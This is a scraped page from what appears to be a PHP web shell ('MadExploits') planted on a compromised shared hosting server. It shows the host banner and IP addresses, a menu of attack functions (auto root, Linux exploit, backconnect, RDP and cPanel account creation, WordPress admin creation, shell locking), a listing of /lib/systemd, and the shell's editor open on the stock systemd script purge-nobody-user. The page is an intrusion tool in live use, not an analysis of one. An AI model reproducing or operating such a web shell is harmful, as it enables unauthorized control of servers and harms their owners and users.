Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.117.172.252
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
boot
[ DIR ]
drwxr-xr-x
catalog
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
portable
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-environment-generators
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
libsystemd-shared-239.so
2.63
MB
-rwxr-xr-x
portablectl
36.99
KB
-rwxr-xr-x
purge-nobody-user
2.3
KB
-rwxr-xr-x
resolv.conf
678
B
-rw-r--r--
systemd
1.53
MB
-rwxr-xr-x
systemd-ac-power
11.87
KB
-rwxr-xr-x
systemd-backlight
24.74
KB
-rwxr-xr-x
systemd-binfmt
16.7
KB
-rwxr-xr-x
systemd-cgroups-agent
12.01
KB
-rwxr-xr-x
systemd-coredump
61.17
KB
-rwxr-xr-x
systemd-cryptsetup
28.74
KB
-rwxr-xr-x
systemd-dissect
16.02
KB
-rwxr-xr-x
systemd-export
41.18
KB
-rwxr-xr-x
systemd-fsck
24.73
KB
-rwxr-xr-x
systemd-growfs
20.43
KB
-rwxr-xr-x
systemd-hibernate-resume
12.01
KB
-rwxr-xr-x
systemd-hostnamed
28.91
KB
-rwxr-xr-x
systemd-initctl
20.44
KB
-rwxr-xr-x
systemd-journald
154.41
KB
-rwxr-xr-x
systemd-localed
49.18
KB
-rwxr-xr-x
systemd-logind
265.31
KB
-rwxr-xr-x
systemd-makefs
12.41
KB
-rwxr-xr-x
systemd-modules-load
20.42
KB
-rwxr-xr-x
systemd-portabled
89.91
KB
-rwxr-xr-x
systemd-pstore
20.88
KB
-rwxr-xr-x
systemd-quotacheck
12.29
KB
-rwxr-xr-x
systemd-random-seed
16.01
KB
-rwxr-xr-x
systemd-remount-fs
24.54
KB
-rwxr-xr-x
systemd-reply-password
12
KB
-rwxr-xr-x
systemd-resolved
452.76
KB
-rwxr-xr-x
systemd-rfkill
24.74
KB
-rwxr-xr-x
systemd-shutdown
61.2
KB
-rwxr-xr-x
systemd-sleep
20.77
KB
-rwxr-xr-x
systemd-socket-proxyd
24.55
KB
-rwxr-xr-x
systemd-sulogin-shell
16.02
KB
-rwxr-xr-x
systemd-sysctl
20.77
KB
-rwxr-xr-x
systemd-timedated
36.95
KB
-rwxr-xr-x
systemd-udevd
408.55
KB
-rwxr-xr-x
systemd-update-done
12.43
KB
-rwxr-xr-x
systemd-update-utmp
16.02
KB
-rwxr-xr-x
systemd-user-runtime-dir
245.1
KB
-rwxr-xr-x
systemd-user-sessions
11.86
KB
-rwxr-xr-x
systemd-vconsole-setup
20.46
KB
-rwxr-xr-x
systemd-veritysetup
12.01
KB
-rwxr-xr-x
systemd-volatile-root
12.01
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : purge-nobody-user
#!/bin/bash -eu if [ $UID -ne 0 ]; then echo "WARNING: This script needs to run as root to be effective" exit 1 fi export SYSTEMD_NSS_BYPASS_SYNTHETIC=1 if [ "${1:-}" = "--ignore-journal" ]; then shift ignore_journal=1 else ignore_journal=0 fi echo "Checking processes..." if ps h -u 99 | grep .; then echo "ERROR: ps reports processes with UID 99!" exit 2 fi echo "... not found" echo "Checking UTMP..." if w -h 199 | grep . ; then echo "ERROR: w reports UID 99 as active!" exit 2 fi if w -h nobody | grep . ; then echo "ERROR: w reports user nobody as active!" exit 2 fi echo "... not found" echo "Checking the journal..." if [ "$ignore_journal" = 0 ] && journalctl -q -b -n10 _UID=99 | grep . ; then echo "ERROR: journalctl reports messages from UID 99 in current boot!" exit 2 fi echo "... not found" echo "Looking for files in /etc, /run, /tmp, and /var..." if find /etc /run /tmp /var -uid 99 -print | grep -m 10 . ; then echo "ERROR: found files belonging to UID 99" exit 2 fi echo "... not found" echo "Checking if nobody is defined correctly..." if getent passwd nobody | grep '^nobody:[x*]:65534:65534:.*:/:/sbin/nologin'; then echo "OK, nothing to do." exit 0 else echo "NOTICE: User nobody is not defined correctly" fi echo "Checking if nfsnobody or something else is using the uid..." if getent passwd 65534 | grep . ; then echo "NOTICE: will have to remove this user" else echo "... not found" fi if [ "${1:-}" = "-x" ]; then if getent passwd nobody >/dev/null; then # this will remove both the user and the group. ( set -x userdel nobody ) fi if getent passwd 65534 >/dev/null; then # Make sure the uid is unused. This should free gid too. name="$(getent passwd 65534 | cut -d: -f1)" ( set -x userdel "$name" ) fi if grep -qE '^(passwd|group):.*\bsss\b' /etc/nsswitch.conf; then echo "Sleeping, so sss can catch up" sleep 3 fi if getent group 65534; then # Make sure the gid is unused, even if uid wasn't. name="$(getent group 65534 | cut -d: -f1)" ( set -x groupdel "$name" ) fi # systemd-sysusers uses the same gid and uid ( set -x systemd-sysusers --inline 'u nobody 65534 "Kernel Overflow User" / /sbin/nologin' ) else echo "Pass '-x' to perform changes" fi
Close